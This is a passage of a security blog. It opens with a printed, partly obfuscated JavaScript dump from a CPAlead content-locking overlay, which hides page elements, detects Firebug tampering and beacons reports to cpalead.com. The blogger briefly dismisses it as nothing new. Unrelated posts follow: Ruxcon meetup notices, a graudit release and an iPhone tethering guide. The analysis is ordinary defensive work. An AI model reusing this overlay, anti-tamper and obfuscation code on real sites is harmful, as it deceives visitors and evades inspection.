yecqogvnndwlktmu(onoroff){iframe_tags=document.getElementsByTagName('iframe');for(i=0;i!=iframe_tags.length;i++){if(iframe_tags[i].id!='wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831'){if(onoroff==0){iframe_tags[i].style.visibility='hidden'}if(onoroff==1){iframe_tags[i].style.visibility='visible'}}}}function jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(onoroff){var embeds=document.getElementsByTagName('embed');for(var ems=document.embeds,i=0,em;em=ems[i];i++){if(em.id!='video_controller'&&em.id!='video_bucket'){if(onoroff==0){if(navigator.appName=='Microsoft Internet Explorer'){em.setAttribute('wmode','transparent');em.style.visibility='hidden'}else{em.setAttribute('wmode','transparent');var nx=em.nextSibling,pn=em.parentNode;pn.removeChild(em);pn.insertBefore(em,nx)}}if(onoroff==1){em.setAttribute('wmode','window');if(navigator.appName=='Microsoft Internet Explorer'){em.style.visibility='visible'}}}}}function mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(onoroff){object_tags=document.getElementsByTagName('object');for(i=0;i!=object_tags.length;i++){if(object_tags[i].id!='video_controller'&&object_tags[i].id!='video_bucket'){if(onoroff==0){object_tags[i].setAttribute('wmode','transparent');object_tags[i].style.visibility='hidden'}if(onoroff==1){object_tags[i].style.visibility='visible';object_tags[i].setAttribute('wmode','window')}}}}function getPageSize(){var c,d;if(window.innerHeight&&window.scrollMaxY){c=window.innerWidth+window.scrollMaxX;d=window.innerHeight+window.scrollMaxY}else if(document.body.scrollHeight>document.body.offsetHeight){c=document.body.scrollWidth;d=document.body.scrollHeight}else{c=document.body.offsetWidth;d=document.body.offsetHeight}var a,b;if(self.innerHeight){a=document.documentElement.clientWidth?document.documentElement.clientWidth:self.innerWidth;b=self.innerHeight}else if(document.documentElement&&document.documentElement.clientHeight){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else if(document.body){a=document.body.clientWidth;b=document.body.clientHeight}pageHeight=d<b?b:d;pageWidth=c<a?c:a;return arrayPageSize=new Array(pageWidth,pageHeight,a,b)}function dontscroll(){var arrayPageSize=getPageSize();if((arrayPageSize[1]-document.getElementById('aijvqsnovujrsfoj3').style.height.replace("px",""))>30){document.getElementById('aijvqsnovujrsfoj3').style.height=(arrayPageSize[1]+'px')}if(mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e==0){setTimeout("dontscroll();",500)}}function mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(gateid,adixdgozwczhuvaf6e84b){if(adixdgozwczhuvaf6e84b!=xwwjxyvbmsrjfpud17e9cae225420){top.location.href='http://www.cpalead.com/adblock.php?pub=42138'}var dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5=document.getElementById('aijvqsnovujrsfoj3');var zcpkmswwmxlgjzbue41a138882143252732d893=document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2');jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(1);mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(1);yecqogvnndwlktmu(1);mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=1;cbtonfugwctexmjdff8bd9e3648ab7=true;if(getWidgetSetting(gateid,'donation_widget')==1&&secondclose!=true){dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.filter="alpha(opacity=0)";dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.opacity="0.0";document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').src='http://www.surveysforcharity.org/thankyou-overlay.php';secondclose=true}else{zcpkmswwmxlgjzbue41a138882143252732d893.style.display='none';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='none';document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').src='about:blank';document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display='none'}return false}function guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9(tampertype){if(!cbtonfugwctexmjdff8bd9e3648ab7&&ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6){if(window.console&&window.console.firebug){var hasfirebug=1}else{var hasfirebug=0}dpjfszjhzduviwkn424c2477e2d48=new Image();dpjfszjhzduviwkn424c2477e2d48.src="http://www.cpalead.com/widget-tamper.php?pub=42138&firebug="+hasfirebug+"&tamper="+tampertype;document.body.appendChild(dpjfszjhzduviwkn424c2477e2d48);sgfplcetedjsqmbvbbcb115()}}function ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69(reason){if(!cbtonfugwctexmjdff8bd9e3648ab7&&ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6){dpjfszjhzduviwkn424c2477e2d48=new Image();dpjfszjhzduviwkn424c2477e2d48.src="http://www.cpalead.com/widget-tamper-test.php?pub=42138&reason="+reason;document.body.appendChild(dpjfszjhzduviwkn424c2477e2d48);lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73('http://www.cpalead.com/nostyle.php?pub=42138')}}function hienslexztaecvon972b4c6959457b72d8591114abeb305d(){if(!document.getElementById('aijvqsnovujrsfoj3')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('overlay-not-found')}else if(!document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('widget-not-found')}else if(!document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('iframe-not-found')}else if(document.getElementById('aijvqsnovujrsfoj3').style.width!="100%"||document.getElementById('aijvqsnovujrsfoj3').style.display!="block"||document.getElementById('aijvqsnovujrsfoj3').style.visibility!="visible"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('overlay-styles')}else if(document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.width!="100%"||document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.display!="block"||document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.visibility!="visible"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('widget-styles')}else if(document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display!="block"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('iframe-not-visible')}if(document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight<=300&&document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight!=0){ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69('iframe-height-invalid-'+document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight)}else if(document.getElementById('aijvqsnovujrsfoj3').offsetHeight<=100&&document.getElementById('aijvqsnovujrsfoj3').clientHeight<=100){ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69('overlay-height-invalid-'+document.getElementById('aijvqsnovujrsfoj3').offsetHeight+'-'+document.getElementById('aijvqsnovujrsfoj3').clientHeight)}setTimeout("hienslexztaecvon972b4c6959457b72d8591114abeb305d()",1000)}function sgfplcetedjsqmbvbbcb115(){var _0x96be=["\x72\x65\x6C\x6F\x61\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];window[_0x96be[1]][_0x96be[0]]()}function lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73(url){var _0xb500=["\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];top[_0xb500[1]][_0xb500[0]]=url}function loadGatewayIframe(gateid){document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').contentWindow.location.replace('http://www.cpalead.com/mygateway_iframe_loader.php?pub=42138&subid=203.45.56.190&gateid='+gateid+'&ref='+escape(document.referrer)+'')}function createOverlay(gateid){var arrayPageSize=getPageSize();var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName("body").item(0);var dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5=document.createElement("div");dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.setAttribute('id','aijvqsnovujrsfoj3');dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='none';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.position='absolute';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.top='0';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.left='0';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.zIndex='11863836';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.width='100%';gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62.insertBefore(dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5,gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62.firstChild);opacity_setting_ie=getWidgetSetting(gateid,'opacity');opacity_setting_moz=opacity_setting_ie/100;document.getElementById('aijvqsnovujrsfoj3').style.filter="alpha(opacity="+opacity_setting_ie+")";document.getElementById('aijvqsnovujrsfoj3').style.opacity=opacity_setting_moz;dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.height=(arrayPageSize[1]+'px');dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='block';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.visibility='visible'}function myGatewayStart(gateid){var closebuttons=['NzMxNTM%3D'];if(!document.getElementById('aijvqsnovujrsfoj3')){createOverlay(gateid)}else{if(document.getElementById('aijvqsnovujrsfoj3').style.display='none'){document.getElementById('aijvqsnovujrsfoj3').style.display='block';opacity_setting_moz=getWidgetSetting(gateid,'opacity')/100;document.getElementById('aijvqsnovujrsfoj3').style.filter="alpha(opacity="+opacity_setting_moz+")";document.getElementById('aijvqsnovujrsfoj3').style.opacity=opacity_setting_moz}}var arrayPageSize=getPageSize();dontscroll();jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(0);mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(0);var zcpkmswwmxlgjzbue41a138882143252732d893=document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2');zcpkmswwmxlgjzbue41a138882143252732d893.style.display='block';zcpkmswwmxlgjzbue41a138882143252732d893.style.visibility='visible';zcpkmswwmxlgjzbue41a138882143252732d893.style.position='absolute';zcpkmswwmxlgjzbue41a138882143252732d893.style.top='0';zcpkmswwmxlgjzbue41a138882143252732d893.style.left='0';zcpkmswwmxlgjzbue41a138882143252732d893.style.zIndex='11863846';zcpkmswwmxlgjzbue41a138882143252732d893.style.width='100%';var has_closebtn=0;for(var i=0;i<closebuttons.length;i++){if(closebuttons[i]==gateid||closebuttons[i]==escape(gateid)){var is_donation=getWidgetSetting(gateid,'donation_widget');if(is_donation==1){document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='<div style="position: relative; width: 72px; top: 158px; right: -225px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" style="cursor: pointer;"><img src="http://static.cpalead.com/images/rice-widget/rice-skin-close-button.png" border="0" alt="Close Widget"></a></div>';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML='<div style="position: relative; width: 72px; top: 158px; right: -225px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" id="closebtn" style="cursor: pointer;"><img width="135" height="40" src="http://static.cpalead.com/images/blank7.gif" border="0" alt="Close Widget"></a></div>'}else{document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" style="cursor: pointer;"><img src="http://static.cpalead.com/images/help/close_btn.png" border="0" alt="Close Widget"></a></div>';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML='<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" id="closebtn" style="cursor: pointer;"><img width="135" height="40" src="http://static.cpalead.com/images/blank7.gif" border="0" alt="Close Widget"></a></div>'}var has_closebtn=1;found=i;break}}if(has_closebtn==0){document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML=''}zcpkmswwmxlgjzbue41a138882143252732d893.style.height=(arrayPageSize[1]+'px');setTimeout("loadGatewayIframe('"+gateid+"');",500);document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display='block';ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=true;setTimeout("hienslexztaecvon972b4c6959457b72d8591114abeb305d();",5000)}function secondpass(){countdown=countdown-1;document.getElementById("closelink").innerHTML=countdown;if(countdown<=0){riunpfcaxfcggjhpf()}else{setTimeout("secondpass()",1000)}}document.write('<style type="text/css">#aijvqsnovujrsfoj3{background-color: #000; filter:alpha(opacity=80); opacity: 0.80; -moz-opacity: 0.80;}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 a {background:none;font-weight:normal;color:#fff;text-decoration:none}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 img {border: 0px;}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 a:hover {background:none;font-weight:normal;color:#fff;text-decoration:underline}</style>');document.write('<div id="wzjyzgbhqzohhlhvef8426b5a89be2" style="display:none; text-align: center; line-height: normal; ">');document.write('<div id="lpepmphihufelzdd28c18f8093587772fdd38f" align="center" style="position: absolute; width: 100%; z-index: 11863866;">');document.write('<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;">');document.write('</div>');document.write('</div>');document.write('<div id="arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c" align="center" style="position: absolute; width: 100%; z-index: 11863936;">');document.write('<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;">');document.write('</div>');document.write('</div>');document.write('<div style="margin: 72px auto 0px; background: transparent; height: 482px; z-index: 11863881;">');document.write('<iframe width="100%" height="640" id="wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831" src="" allowtransparency="true" frameborder="0" style="position: relative; height: 640px; overflow-x: hidden; overflow-y: hidden; background-color: transparent; z-index: 11863886; " scrollbars="NO"></iframe>');document.write('</div></div>');

The next steps would be far to time consuming for me given the glaringly obvious conclusion you can draw by googleing for cpalead or http://www.cpalead.com/mygateway_iframe_loader.php. In conclusion there isn't anything new here. The techniques aren't very advanced, but god enough to keep the general public ignorant of what's really going on. I did find the firebug / anti tamper code used in the last bit of js interesting, but I'm sure that malware analysts have seen it thousands of times before.

I am presenting at this months Ruxcon Monthly Meetup.

Date: Friday, 25th June
Time: 6:00PM
Location: RMIT University, City Campus
https://my.rmit.edu.au/portal/page/portal/RMITPortal/campusmaps?dsize=max
Room: Building 8, Level 9, Room 42 (008.09.042)

RMIT Building 8 entrance is off Swanston Street (just past Swanston and 
La Trobe). Please take the lift to Level 9 and make your way to Room 42. 
We will have directions posted up in the building.

Presentations
=============

Unsanitary Web Activities - Tim Noise (MovingData)

In the land of the internet, web developers are constantly rolling out 
new applications and letting them free into the Internet. Many with 
little knowledge or experience in security. They assume the users will 
provide data in a manner they expect. This talk will cover webapp 
security basics and commonplace attacks, showing you the effect this 
oversight can have, and how to prevent it.

Pownage Coquillage: Real World Tales From The Trenches - Sash Biskup  
(Stratsec)

In this talk the presenter will discuss various security incidents he 
has been involved in during the course of his career.  Starting with old 
school bof through to modern day malware and blackmail.  This isn't a 
deep technical analysis of each incident but an overview of the 
charateristics of each of the attacks and what the repurcussions were to 
the organisation or individual.

Static analysis with Graudit - Eldar Marcussen

Graudit is a rough audit tool, that can be used to find vulnerabilities 
in source code (C, ASP, .NET, JSP, PHP, Perl and Python). In this 
presentation I will show how to get the most out of graudit.

After a short hiatus I am happy to deliver the next graudit release. Version 1.6 introduces three new databases, c, dotnet and "all". The all database is a combined database of all the distributed signatures so you can easier scan multi language projects. The rough database has also been deprecated. As usual there are some new features, bug fixes and signature tweaks, see the changelog for the full details.

You can download the latest version from the graudit download page.
Please note that with the current changes to the test suite there is no development (.src.tar.gz) release. If you are a package maintainer or otherwise wish to use the development release you can either clone the git repository or wait for the upcoming 1.7 release.

Since my iphone is a company phone, jailbreak was never an option. I'm surprised to see the amount of terrible "tether your iphone by jailbreaking it" guides there is out there. I suppose at some stage there was no decent driver in sight. ANyway, this is how you tether the iphone by installing third party compiled binaries.

First we add the third party repository and update the apt cache (this has security implications, so don't cry if your wall paper suddenly changes to tubgirl):

    sudo add-apt-repository ppa:pmcenery/ppa
    sudo apt-get update

Then we install the required modules (accept the dependencies):

    sudo apt-get install gvfs ipheth-utils

This will install and insmod the ipheth driver. Make sure that internet sharing is enabled on your iphone and plug it in. It should show up as a wired connection. If something went wrong check your dmesg. I have experience timeouts on TX which caused it not to initialize. Replugging did the trick.

In the spirit of openness the Apache foundation has released an excellent post mortem write up of their recent compromise. It started with a XSS attack leveraged through the issue tracking software they use (JIRA) and ended with complete root access on one server, limited access to another and a number of passwords compromised.

Read the entire story at https://blogs.apache.org/infra/entry/apache_org_04_09_2010

From Chris Spencer on the ruxcon mailing list:

As part of a new initiative, the Ruxcon Team in conjunction with RMIT Information Security Collective, have established a monthly meeting in Melbourne. The aim of the meeting is to encourage individuals to perform a short presentation on computer security or a related topic in front of a small audience. The monthly meetings are open to everyone and free to attend.

The presentations are intended to be short (between 5-20 minutes), a projector and screen will be provided. We encourage participation from everyone and hope to see a variety of presentations over the coming months. Any topic is welcome, a presentation could be as simple as speaking for 5 minutes about a project you are currently working on, or day to day work tasks within your given field.

If you are interested in participating please email us at ruxcon ruxcon org au.

Please join us on Friday and help make the kickoff a success!

Details for the kickoff:

Date: Friday, 23rd April
Time: 6:00pm
Location: RMIT University, City Campus
https://my.rmit.edu.au/portal/page/portal/RMITPortal/campusmaps?dsize=max
Room 008.09.041 (Building 8, Level 9, Room 41)

Presentations:

• SQL Injections 101 - Louis Nyffenegger (@snyff)
  
• Malware Analysis for Incident Response - Ash Fox
• Binary Analysis Basics - Chris Spencer